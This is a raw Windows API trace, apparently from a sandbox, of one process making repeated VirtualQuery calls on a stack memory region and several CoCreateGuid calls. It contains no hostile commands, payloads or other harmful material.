	[0430.705] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.705] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.705] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.705] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.705] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.705] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24b6a0, lpBuffer=0x24c560, dwLength=0x30 | out: lpBuffer=0x24c560*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.706] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.707] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.707] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.707] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.707] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd0bd053f, Data2=0xce4f, Data3=0x4368, Data4=([0]=0xbc, [1]=0x7, [2]=0x7b, [3]=0xbe, [4]=0x11, [5]=0xd6, [6]=0xdb, [7]=0x42))) returned 0x0
	[0430.707] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x35e2a430, Data2=0xb8b2, Data3=0x45d7, Data4=([0]=0x8f, [1]=0x57, [2]=0x25, [3]=0xea, [4]=0x5d, [5]=0xd9, [6]=0x3f, [7]=0x7))) returned 0x0
	[0430.708] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.708] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.708] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.708] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.708] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.709] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.709] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.709] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.709] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.709] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.710] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.710] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.710] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.710] VirtualQuery (in: lpAddress=0x24bb70, lpBuffer=0x24ca30, dwLength=0x30 | out: lpBuffer=0x24ca30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.711] VirtualQuery (in: lpAddress=0x24bb70, lpBuffer=0x24ca30, dwLength=0x30 | out: lpBuffer=0x24ca30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.711] VirtualQuery (in: lpAddress=0x24bb70, lpBuffer=0x24ca30, dwLength=0x30 | out: lpBuffer=0x24ca30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.711] VirtualQuery (in: lpAddress=0x24bb70, lpBuffer=0x24ca30, dwLength=0x30 | out: lpBuffer=0x24ca30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.711] VirtualQuery (in: lpAddress=0x24b260, lpBuffer=0x24c120, dwLength=0x30 | out: lpBuffer=0x24c120*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.712] VirtualQuery (in: lpAddress=0x24b2f0, lpBuffer=0x24c1b0, dwLength=0x30 | out: lpBuffer=0x24c1b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.712] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.712] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.712] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.712] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.713] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] VirtualQuery (in: lpAddress=0x24b6a0, lpBuffer=0x24c560, dwLength=0x30 | out: lpBuffer=0x24c560*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.714] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x729ba289, Data2=0xd3ca, Data3=0x4dbc, Data4=([0]=0xa9, [1]=0x27, [2]=0x2, [3]=0xcc, [4]=0xa7, [5]=0x5a, [6]=0x97, [7]=0x15))) returned 0x0
	[0430.715] VirtualQuery (in: lpAddress=0x24b260, lpBuffer=0x24c120, dwLength=0x30 | out: lpBuffer=0x24c120*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.715] VirtualQuery (in: lpAddress=0x24b2f0, lpBuffer=0x24c1b0, dwLength=0x30 | out: lpBuffer=0x24c1b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.715] VirtualQuery (in: lpAddress=0x24b510, lpBuffer=0x24c3d0, dwLength=0x30 | out: lpBuffer=0x24c3d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.716] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x5f048174, Data2=0xb78b, Data3=0x4a0f, Data4=([0]=0xbe, [1]=0x6a, [2]=0x94, [3]=0x38, [4]=0x7b, [5]=0xdd, [6]=0x9e, [7]=0x8))) returned 0x0
	[0430.716] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x30c3924d, Data2=0xd9af, Data3=0x45a3, Data4=([0]=0xa4, [1]=0x4, [2]=0xe9, [3]=0x76, [4]=0x96, [5]=0x63, [6]=0x89, [7]=0xd9))) returned 0x0
	[0430.716] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa0c2b2d6, Data2=0x8a1f, Data3=0x4240, Data4=([0]=0xa9, [1]=0x69, [2]=0x15, [3]=0x7f, [4]=0xa9, [5]=0xa0, [6]=0x1e, [7]=0x84))) returned 0x0
	[0430.716] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x9329ec0c, Data2=0xb34f, Data3=0x4648, Data4=([0]=0xbd, [1]=0x3d, [2]=0x28, [3]=0x60, [4]=0xdd, [5]=0xb7, [6]=0x35, [7]=0x1b))) returned 0x0
	[0430.717] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x7cd1b7ee, Data2=0x3ccb, Data3=0x499b, Data4=([0]=0xae, [1]=0x2f, [2]=0x11, [3]=0xc6, [4]=0xa4, [5]=0x30, [6]=0xeb, [7]=0x69))) returned 0x0
	[0430.717] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xa1cf51c3, Data2=0x4d8e, Data3=0x4532, Data4=([0]=0x84, [1]=0xd4, [2]=0x59, [3]=0x3b, [4]=0x5f, [5]=0x91, [6]=0xf9, [7]=0x28))) returned 0x0
	[0430.717] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xbe836d21, Data2=0x578c, Data3=0x49d4, Data4=([0]=0x84, [1]=0x81, [2]=0x86, [3]=0xb8, [4]=0x97, [5]=0x36, [6]=0x9b, [7]=0x91))) returned 0x0
	[0430.717] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc75be125, Data2=0x1941, Data3=0x45ad, Data4=([0]=0xb6, [1]=0xca, [2]=0xe1, [3]=0x60, [4]=0x7b, [5]=0xf6, [6]=0x95, [7]=0xcd))) returned 0x0
	[0430.717] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.718] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.719] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.719] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.814] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.815] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.815] VirtualQuery (in: lpAddress=0x24b0d0, lpBuffer=0x24bf90, dwLength=0x30 | out: lpBuffer=0x24bf90*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.815] VirtualQuery (in: lpAddress=0x24b160, lpBuffer=0x24c020, dwLength=0x30 | out: lpBuffer=0x24c020*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.815] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.815] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] VirtualQuery (in: lpAddress=0x24b9d0, lpBuffer=0x24c890, dwLength=0x30 | out: lpBuffer=0x24c890*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.816] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf64a5d5a, Data2=0xf4b, Data3=0x40b8, Data4=([0]=0xbb, [1]=0xf1, [2]=0x58, [3]=0xec, [4]=0x56, [5]=0x29, [6]=0x84, [7]=0x5a))) returned 0x0
	[0430.817] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.817] VirtualQuery (in: lpAddress=0x24b9e0, lpBuffer=0x24c8a0, dwLength=0x30 | out: lpBuffer=0x24c8a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.817] VirtualQuery (in: lpAddress=0x24ba70, lpBuffer=0x24c930, dwLength=0x30 | out: lpBuffer=0x24c930*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
